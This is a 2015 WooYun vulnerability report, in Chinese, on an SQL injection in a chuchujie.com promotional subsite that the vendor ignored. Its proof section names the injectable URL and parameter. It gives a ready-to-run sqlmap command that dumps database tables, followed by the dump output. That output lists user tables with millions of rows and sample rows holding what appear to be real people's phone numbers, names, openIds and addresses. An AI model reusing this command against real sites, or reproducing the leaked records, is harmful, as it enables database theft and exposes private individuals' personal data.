当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153270

漏洞标题:楚楚街某分站存在SQL注入漏洞(买得漂亮也要买得安全)

相关厂商:chuchujie.com

漏洞作者: 猪猪侠

提交时间:2015-11-10 12:36

修复时间:2015-11-23 09:30

公开时间:2015-11-23 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

双十一,要狂欢,也要安全
楚楚街某分站存在SQL注入漏洞(买得漂亮,也要买得安全)
涉及上千万订单信息,几百万用户信息

详细说明:

#1 注入地址

http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods
注入参数 category1

漏洞证明:

#漏洞证明

python sqlmap.py -u "http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods" -D huodong -T inviteOrders --dump --start 1 --stop 5


Database: huodong
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| inviteOrders             | 10922341 |
| zlUserinfo3              | 7929815 |
| inviteUser               | 7467237 |
| sso_openid               | 4531859 |
| zlUserinfo4              | 3608880 |
| digAlert                 | 3415202 |
| digUser201508            | 1975330 |
| digUser                  | 1953446 |
| digUser201509            | 1626351 |
| digUser201504            | 1575203 |
| digUser201507            | 1465415 |
| digUserGift              | 1418846 |
| digUser201510            | 1329393 |
| digUser201506            | 1325872 |
| zlComment5               | 1066662 |
| digUser201505            | 967930  |
| zlComment12              | 680894  |
| digUserWish              | 559441  |
| rp_getuser               | 536124  |
| springUser               | 515823  |


Database: huodong
Table: zlUserinfo3
[5 entries]
+----+--------+----------+-------------+-----------------------------------------+------------+
| id | itemid | userId   | userTel     | awardCode                               | created_on |
+----+--------+----------+-------------+-----------------------------------------+------------+
| 1  | 149    | 23838667 | 13413191722 | CC0000001,CC0000014,CC0000015,CC0000016 | 20150827   |
| 2  | 149    | 11775670 | 13938139707 | CC0000002,CC0000569,CC0000570,CC0000571 | 20150827   |
| 3  | 149    | 22771867 | 15139134935 | CC0000003,CC0000026,CC0000027,CC0000028 | 20150827   |
| 4  | 149    | 24953981 | 18316113437 | CC0000004,CC0000367,CC0000368,CC0000369 | 20150827   |
| 5  | 149    | 6822479  | 13333222660 | CC0000005,CC0000299,CC0000300,CC0000301 | 20150827   |
+----+--------+----------+-------------+-----------------------------------------+------------+


Database: huodong
Table: inviteOrders
[5 entries]
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+
| id | cid   | skuId   | openId                       | areaId    | shopId | productId  | orderSN | userTel     | userName                            | userArea                                                          | createdOn           | version   | userAddress                                                                                                                            |
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+
| 1  | 11281 | 9250445 | oioKYtyPvFefOgsJy5rX0KSF-b8c | 101001005 | 4063   | 1000406353 | <blank> | 13718304689 | \测\试\马\艳\琴 | \北\京\市,\北\京\市,\朝\阳\区 | 2015-05-18 13:13:05 | 16        | \北\京\市\朝\阳\区\霄\云\路28\号\院\网\信\大\厦2\号\楼6\层     |
| 3  | 11281 | 2514131 | oioKYt17Cj7d8abZTB3-60Q3bhEo | 117010006 | 1219   | 1000121919 | <blank> | 15801421563 | \小\倩\测\试        | \河\南\省,\商\丘\市,\民\权\县 | 2015-05-18 13:48:46 | 21        | \河\南\省\商\丘\市\民\权\县\绿\洲\超\市\附\近                              |
| 4  | 11281 | 6141583 | oioKYtxQzv2Bo7UxugkBPI5FBxtU | 101001010 | 2766   | 1000276611 | <blank> | 18510157865 | \李\亚\品               | \北\京\市,\北\京\市,\房\山\区 | 2015-05-18 14:18:00 | 4         | \良\乡\镇\大\学\城\西\鸿\顺\园\西\区12\号\楼2\单\元501                 |
| 6  | 11281 | 5040174 | oioKYtzFn1zsRswMZbrwcjjt9ka8 | 101001008 | 4857   | 100048571  | <blank> | 18611544505 | \项\秋\媛               | \北\京\市,\北\京\市,\海\淀\区 | 2015-05-18 14:51:38 | 24        | \丰\慧\中\路7\号\新\材\料\大\厦11\层                                                       |
| 7  | 11281 | 5131414 | oioKYt4IJwMn6JFZ-UmFMdA5GKOU | 101001008 | 2250   | 1000225046 | <blank> | 18911471706 | \朱\加\保               | \北\京\市,\北\京\市,\海\淀\区 | 2015-05-18 15:08:20 | 3         | \北\京\市\海\淀\区\中\关\村\东\路123\号\都\市\网\景3\号\口2003 |
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+-------------------------------------+-------------------------------------------------------------------+---------------------+-----------+----------------------------------------------------------------------------------------------------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-23 09:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无